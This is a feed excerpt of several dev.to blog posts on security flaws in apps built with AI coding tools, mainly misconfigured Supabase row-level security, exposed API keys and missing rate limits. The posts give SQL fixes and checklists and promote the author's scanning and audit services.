&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'authenticated'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy says: if you are logged in, you can read all rows. Every row. Every user's data.&lt;/p&gt;

&lt;p&gt;Here is what it should say:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The difference is one function call. &lt;code&gt;auth.role()&lt;/code&gt; checks if someone is logged in. &lt;code&gt;auth.uid()&lt;/code&gt; checks if the logged-in user owns that specific row. One character of difference in the code, total difference in security.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why AI tools get this wrong
&lt;/h2&gt;

&lt;p&gt;When you prompt Lovable or Cursor to "add authentication to my app," the AI does exactly what you asked. It adds login and signup. It creates the database tables. It enables RLS.&lt;/p&gt;

&lt;p&gt;But the AI optimizes for "works correctly" not "works securely." The policy it generates passes every test: authenticated users can read data, unauthenticated users cannot. That is technically correct. It is also a data breach.&lt;/p&gt;

&lt;p&gt;Nobody prompts the AI to add ownership checks. The AI does not add them unprompted. The result is an app that looks secure but leaks data between users.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to check yours in 2 minutes
&lt;/h2&gt;

&lt;p&gt;Open the Supabase SQL editor and run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt;
  &lt;span class="n"&gt;schemaname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;tablename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;policyname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;qual&lt;/span&gt;
&lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;pg_policies&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;schemaname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'public'&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;tablename&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look at the &lt;code&gt;qual&lt;/code&gt; column. If you see &lt;code&gt;(auth.role() = 'authenticated'::text)&lt;/code&gt; on any table that stores user data, you have the problem.&lt;/p&gt;

&lt;p&gt;If you see &lt;code&gt;(auth.uid() = user_id)&lt;/code&gt; or something similar with &lt;code&gt;auth.uid()&lt;/code&gt;, you are probably fine for that table.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix
&lt;/h2&gt;

&lt;p&gt;For each table that stores user-specific data:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Drop the broken policy&lt;/span&gt;
&lt;span class="k"&gt;DROP&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view data"&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;-- Create the correct one&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can view their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;-- Do the same for INSERT, UPDATE, DELETE&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can insert their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;INSERT&lt;/span&gt;
&lt;span class="k"&gt;WITH&lt;/span&gt; &lt;span class="k"&gt;CHECK&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can update their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;UPDATE&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="n"&gt;POLICY&lt;/span&gt; &lt;span class="nv"&gt;"Users can delete their own data"&lt;/span&gt;
&lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="k"&gt;public&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user_data&lt;/span&gt;
&lt;span class="k"&gt;FOR&lt;/span&gt; &lt;span class="k"&gt;DELETE&lt;/span&gt;
&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;uid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Replace &lt;code&gt;user_data&lt;/code&gt; with your actual table name. Replace &lt;code&gt;user_id&lt;/code&gt; with whatever column stores the user's UUID in that table.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common variations that are also broken
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Service role bypass:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'service_role'&lt;/span&gt; &lt;span class="k"&gt;OR&lt;/span&gt; &lt;span class="n"&gt;auth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;role&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'authenticated'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Still broken. Any authenticated user reads everything.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;True for all:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;USING&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No restriction at all. Anon users can read everything. This appears more often than you would expect.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Missing policies entirely:&lt;/strong&gt;&lt;br&gt;
Some tables have RLS enabled but zero policies. This actually blocks all access (Supabase defaults to deny), which is better than the wrong policy. But it usually means the developer disabled RLS on that table to "fix" their app when queries stopped working.&lt;/p&gt;
&lt;h2&gt;
  
  
  Tables that need ownership checks
&lt;/h2&gt;

&lt;p&gt;Not every table needs &lt;code&gt;auth.uid() = user_id&lt;/code&gt;. Here is a quick breakdown:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs ownership check:&lt;/strong&gt; profiles, user_data, orders, messages, documents, settings, anything with personal or financial data&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does not need ownership check:&lt;/strong&gt; public content (blog posts set to published), lookup tables (countries, categories), app configuration&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Needs role-based check:&lt;/strong&gt; admin panels, moderation queues, shared team data&lt;/p&gt;
&lt;h2&gt;
  
  
  What happens when this is wrong
&lt;/h2&gt;

&lt;p&gt;A user creates an account on your app. They open browser DevTools. They go to the Network tab. They find a Supabase request. They copy the URL and anon key (both visible in the JavaScript bundle). They run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="s1"&gt;'https://your-project.supabase.co/rest/v1/user_data?select=*'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"apikey: your-anon-key"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Authorization: Bearer their-jwt-token"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every user's data comes back. Names, emails, financial data, health data, whatever you store. One curl command.&lt;/p&gt;

&lt;h2&gt;
  
  
  Beyond RLS
&lt;/h2&gt;

&lt;p&gt;RLS is the most common issue but not the only one. Other things to check:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;API keys in your JS bundle.&lt;/strong&gt; Open your deployed site, view source, search for &lt;code&gt;eyJ&lt;/code&gt;. Your Supabase anon key will be there (expected). Anything else should not be.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Auth email verification.&lt;/strong&gt; Is it required? If not, anyone can sign up with any email and start querying.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rate limiting.&lt;/strong&gt; Are your auth endpoints rate-limited? If not, brute force attacks work.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Storage bucket policies.&lt;/strong&gt; If you use Supabase Storage, the bucket policies have the same RLS problem. Check them separately.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We built free security tools specifically for this at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;. The code scanner checks for exposed keys and common misconfigurations. No signup required.&lt;/p&gt;

&lt;p&gt;If you want a deeper review covering all of the above plus business logic, auth flows, and API design, our &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 security audit&lt;/a&gt; covers 50+ checks with a PDF report.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Part of the &lt;a href="https://dev.to/solobillions"&gt;Vibe Coding Security series&lt;/a&gt;. More guides on Lovable, Cursor, Bolt, and Windsurf security at &lt;a href="https://notelon.ai/report" rel="noopener noreferrer"&gt;notelon.ai/report&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>supabase</category>
      <category>security</category>
      <category>vibecoding</category>
      <category>webdev</category>
    </item>
    <item>
      <title>The UK Government Just Called Vibe Coding Security Risks 'Intolerable'</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sun, 29 Mar 2026 13:27:58 +0000</pubDate>
      <link>https://dev.to/solobillions/the-uk-government-just-called-vibe-coding-security-risks-intolerable-14hd</link>
      <guid>https://dev.to/solobillions/the-uk-government-just-called-vibe-coding-security-risks-intolerable-14hd</guid>
      <description>&lt;p&gt;The head of the UK's National Cyber Security Centre (NCSC) stood up at RSA Conference last week and called the security risks from AI-generated code "intolerable."&lt;/p&gt;

&lt;p&gt;The same week, Cursor's CEO warned that vibe coding builds "shaky foundations" that eventually "crumble."&lt;/p&gt;

&lt;p&gt;The same week, someone compromised LiteLLM's PyPI package and got 47,000 poisoned downloads in 46 minutes.&lt;/p&gt;

&lt;p&gt;These aren't separate stories. They're the same story.&lt;/p&gt;

&lt;h2&gt;
  
  
  What the NCSC actually said
&lt;/h2&gt;

&lt;p&gt;The NCSC CEO called for international cooperation on vibe coding security. Not guidelines. Not best practices. International cooperation. That's the language governments use when they think a problem is bigger than any one country can solve.&lt;/p&gt;

&lt;p&gt;Why? Because vibe-coded apps are shipping to production at a rate that outpaces any security review process. The code compiles. The tests pass. The app works. The security is broken.&lt;/p&gt;

&lt;h2&gt;
  
  
  What "broken security" actually looks like
&lt;/h2&gt;

&lt;p&gt;We've been scanning vibe-coded apps for months. The pattern is the same every time:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Supabase RLS disabled or misconfigured.&lt;/strong&gt; Default Lovable setup ships with Row Level Security that checks "is this user authenticated?" instead of "does this user own this data?" Any logged-in user can read any other user's records. For a todo app, whatever. For a health app with 8,700 users storing body metrics? That's a data breach waiting to happen.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;API keys in client-side JavaScript bundles.&lt;/strong&gt; Vite and Next.js handle environment variables differently. Vibe coders rarely know the difference. We regularly find Supabase anon keys, Stripe publishable keys, and occasionally secret keys sitting in the JS bundle anyone can read with browser DevTools.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Zero rate limiting on auth endpoints.&lt;/strong&gt; No brute-force protection on login. No cooldown on password reset. No limit on API calls. The AI never adds these because nobody prompts for them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;No input validation on database-touching forms.&lt;/strong&gt; The AI builds the form. The form submits to Supabase. Nothing in between checks whether the input is valid, safe, or even the expected type.&lt;/p&gt;

&lt;h2&gt;
  
  
  The numbers
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Escape.tech scanned 5,600 AI-built apps. 60% failed basic security checks.&lt;/li&gt;
&lt;li&gt;Wikipedia tracked 1,645 Lovable-created web apps. 170 had personal data access issues.&lt;/li&gt;
&lt;li&gt;ReversingLabs documented a cascading supply chain attack (TeamPCP) that hit LiteLLM and Telnyx in the same week, compromising 47,000 and 742,000 downloads respectively.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  What Cursor's CEO got wrong
&lt;/h2&gt;

&lt;p&gt;Michael Truell compared vibe coding to "erecting four walls and a roof while being oblivious to the details lurking beneath the floorboards or within the wiring."&lt;/p&gt;

&lt;p&gt;The metaphor is wrong. The floorboards are fine. The wiring works. The problem is that the house has no locks on the doors, no fence around the yard, and the windows don't close. Everything functions. Nothing is secure.&lt;/p&gt;

&lt;p&gt;The fix isn't "learn to code properly" as Truell implies. The fix is: review your security defaults before you deploy. 20 minutes checking RLS, env vars, auth flows, and rate limiting. That's it.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to do about it
&lt;/h2&gt;

&lt;p&gt;If you've shipped a vibe-coded app to production:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Check your Supabase RLS policies.&lt;/strong&gt; Open the SQL editor and verify every table has policies that check &lt;code&gt;auth.uid() = user_id&lt;/code&gt;, not just &lt;code&gt;auth.role() = 'authenticated'&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Search your deployed JS bundle for JWTs and API keys.&lt;/strong&gt; Open DevTools, go to Sources, and search for &lt;code&gt;eyJ&lt;/code&gt; (the base64 prefix of every JWT). If you find your Supabase anon key, that's expected. If you find anything else, you have a problem.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Add rate limiting to your auth endpoints.&lt;/strong&gt; Even a simple 5-requests-per-minute limit on login and password reset prevents brute force.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Run a security scanner.&lt;/strong&gt; We built free tools at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt; specifically for vibe-coded apps. No signup required. If you want a deeper review, our &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 audit&lt;/a&gt; covers 50+ checks with a PDF report.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The NCSC, Cursor's CEO, and the supply chain attacks are all pointing at the same thing: the code works, the security doesn't. The good news is it's fixable. The bad news is most people won't fix it until something breaks.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Full security report with 63+ sources: &lt;a href="https://notelon.ai/report" rel="noopener noreferrer"&gt;notelon.ai/report&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>vibecoding</category>
      <category>webdev</category>
      <category>ai</category>
    </item>
    <item>
      <title>What a $1,000 Code Review Actually Finds in Lovable and Claude Code Apps</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sat, 28 Mar 2026 20:28:18 +0000</pubDate>
      <link>https://dev.to/solobillions/what-a-1000-code-review-actually-finds-in-lovable-and-claude-code-apps-3247</link>
      <guid>https://dev.to/solobillions/what-a-1000-code-review-actually-finds-in-lovable-and-claude-code-apps-3247</guid>
      <description>&lt;p&gt;A post on r/vibecoding went viral this week. Someone paid a senior dev $1,000 on Upwork to review their vibe-coded app. The verdict: "good code, just needs a few security concerns addressed."&lt;/p&gt;

&lt;p&gt;That's the outcome for almost every vibe-coded app I've looked at. The code works. The UI is fine. The security is broken.&lt;/p&gt;

&lt;p&gt;Here's what actually shows up in these reviews.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Same 5 Issues, Every Time
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Supabase RLS policies that don't exist or don't work&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Lovable sets up Supabase for you. It creates tables, writes queries, handles auth. What it doesn't do reliably is lock down who can read what.&lt;/p&gt;

&lt;p&gt;Open your Supabase dashboard right now. Go to Authentication &amp;gt; Policies. If you see tables with no policies, that table is readable by anyone with your Supabase URL and anon key. Both are in your client bundle. Anyone can open devtools and find them.&lt;/p&gt;

&lt;p&gt;The fix is row-level security policies on every table. But the AI generates policies that look right and aren't. A common one: a policy that checks &lt;code&gt;auth.uid() = user_id&lt;/code&gt; on SELECT but has no policy on UPDATE or DELETE. So users can read only their own data but can modify anyone's.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. API keys in the client bundle&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Open your deployed app. Open devtools. Go to Sources. Search for "sk_" or "key" or "secret" or "Bearer". If you find anything, that key is public.&lt;/p&gt;

&lt;p&gt;Vibe coding tools don't always know which API calls should happen server-side. They'll put a Stripe secret key or an OpenAI API key directly in a React component because the code works and the AI optimizes for working code.&lt;/p&gt;

&lt;p&gt;One app I reviewed had a Resend API key in the client. Anyone could send emails as that company. Another had an OpenAI key that was burning $40/day from unauthorized usage before the founder noticed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. No rate limiting on auth endpoints&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Sign up, login, password reset. AI tools generate these flows and they work great. What they don't add is rate limiting.&lt;/p&gt;

&lt;p&gt;Someone can hit your login endpoint 10,000 times per second with different passwords. No lockout, no delay, no CAPTCHA. For password reset: an attacker can trigger thousands of reset emails to any address, which gets your email domain blacklisted.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Missing input validation on the backend&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI validates inputs on the frontend. It checks email format, required fields, string length. But if someone bypasses the frontend (which is trivial), the backend accepts anything.&lt;/p&gt;

&lt;p&gt;This means SQL injection, XSS stored in your database, and malformed data that breaks your app for other users. Supabase edge functions generated by AI almost never validate input types.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Dependencies with known vulnerabilities&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every vibe-coded app I've seen has at least 3 npm packages with known CVEs. The AI picks packages that work, not packages that are maintained. A &lt;code&gt;npm audit&lt;/code&gt; will show you, but most vibe coders never run it.&lt;/p&gt;

&lt;p&gt;The recent TeamPCP supply chain attack targeted PyPI packages (telnyx, litellm) with malicious versions. If you're using AI to pick your dependencies, you're trusting that the AI knows which version is safe. It doesn't.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why This Matters Now
&lt;/h2&gt;

&lt;p&gt;When your app has 0 users, none of this matters. But the moment someone enters their email, their payment info, their personal data, you're liable.&lt;/p&gt;

&lt;p&gt;GDPR fines start at 10 million euros for data breaches caused by inadequate security. Even in the US, state privacy laws are getting teeth. "I used AI to build it" is not a defense.&lt;/p&gt;

&lt;p&gt;170 out of 1,645 Lovable-created apps were found to have data exposure issues earlier this year. That's over 10%.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Market Gap
&lt;/h2&gt;

&lt;p&gt;Here's the reality of getting a code review as a vibe coder:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Free:&lt;/strong&gt; Ask Claude/ChatGPT to review your code. It'll find surface-level issues but miss the architectural ones. It generated the code, so it has the same blind spots.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;$500-$1,000:&lt;/strong&gt; Hire a senior dev on Upwork. Takes a week. May not specialize in the specific security patterns of AI-generated code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;$5,000+:&lt;/strong&gt; Professional penetration test. Enterprise-grade but overkill for a solo founder's MVP.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There's nothing in between for the vibe coder who just wants to know: "Is my app safe to launch?"&lt;/p&gt;

&lt;p&gt;That's the gap. A focused security audit that knows exactly where Lovable, Cursor, Bolt, and Claude Code break. Not a general code review. A checklist of the exact vulnerabilities these tools introduce, tested against your specific app, with copy-paste fix prompts you can feed back into the AI.&lt;/p&gt;

&lt;h2&gt;
  
  
  Check Your App Right Now
&lt;/h2&gt;

&lt;p&gt;Before you ship, run through this yourself:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Open Supabase &amp;gt; Authentication &amp;gt; Policies. Every table should have RLS enabled with policies for SELECT, INSERT, UPDATE, DELETE.&lt;/li&gt;
&lt;li&gt;Open devtools on your deployed app. Search Sources for API keys (sk_, key_, secret, Bearer).&lt;/li&gt;
&lt;li&gt;Try signing up 10 times in 10 seconds. If it works every time, you have no rate limiting.&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;npm audit&lt;/code&gt; in your project. Fix anything marked critical or high.&lt;/li&gt;
&lt;li&gt;Check your .env file isn't committed to git: &lt;code&gt;git log --all -- .env&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;If you want a deeper check, I built a free scanner at &lt;a href="https://notelon.ai/tools/vibecheck" rel="noopener noreferrer"&gt;notelon.ai/tools/vibecheck&lt;/a&gt; that runs automated checks against your repo. For a full manual audit with a PDF report and fix prompts, there's a &lt;a href="https://notelon.ai/services/audit" rel="noopener noreferrer"&gt;$99 audit service&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;I build security tools for vibe coders at &lt;a href="https://notelon.ai" rel="noopener noreferrer"&gt;notelon.ai&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>vibecoding</category>
      <category>security</category>
      <category>webdev</category>
      <category>programming</category>
    </item>
    <item>
      <title>If You're Selling Vibe-Coded Apps to Clients, You're One Breach Away From a Lawsuit</title>
      <dc:creator>Not Elon</dc:creator>
      <pubDate>Sat, 28 Mar 2026 07:57:31 +0000</pubDate>
      <link>https://dev.to/solobillions/if-youre-selling-vibe-coded-apps-to-clients-youre-one-breach-away-from-a-lawsuit-31i5</link>
      <guid>https://dev.to/solobillions/if-youre-selling-vibe-coded-apps-to-clients-youre-one-breach-away-from-a-lawsuit-31i5</guid>
      <description>&lt;p&gt;You built a client's app in 3 hours with Lovable. Charged $500. Client loved it. Shipped it.&lt;/p&gt;

&lt;p&gt;Six weeks later, their customer data leaks. The client's lawyer sends you a letter.&lt;/p&gt;

&lt;p&gt;This isn't hypothetical. It's the trajectory.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Numbers Nobody's Talking About
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;60%&lt;/strong&gt; of AI-generated apps fail basic security tests (Escape.tech, 5,600 apps scanned)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;67%&lt;/strong&gt; of vibe-coded repos have critical vulnerabilities (ShipSafe, 100 repos audited)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;35 new CVEs in March 2026 alone&lt;/strong&gt; from AI-generated code (Georgia Tech Vibe Radar)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;47,000 poisoned downloads in 46 minutes&lt;/strong&gt; when LiteLLM was supply chain attacked last week&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You're not building insecure apps on purpose. The AI tools you're using are generating insecure code by default. Missing Row Level Security. Hardcoded API keys. No input validation. Client-side only authentication.&lt;/p&gt;

&lt;p&gt;The AI optimizes for "it works." Not "it's secure."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Liability Problem
&lt;/h2&gt;

&lt;p&gt;When you build an app for a client, you own the outcome. "I used AI to build it" is not a legal defense. Neither is "I didn't know it was insecure."&lt;/p&gt;

&lt;p&gt;If client data gets exposed because you shipped an app with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No RLS on Supabase tables (anyone can read any user's data)&lt;/li&gt;
&lt;li&gt;Hardcoded API keys in client-side code (visible in browser dev tools)&lt;/li&gt;
&lt;li&gt;No rate limiting (bot can dump the entire database)&lt;/li&gt;
&lt;li&gt;Missing security headers (clickjacking, XSS)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;...that's on you. Not the AI tool. Not the platform. You.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Fix (That Also Makes You More Money)
&lt;/h2&gt;

&lt;p&gt;Add a security audit as an upsell on every project.&lt;/p&gt;

&lt;p&gt;Not "learn security." Not "become a pentester." Outsource it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The pitch to clients:&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
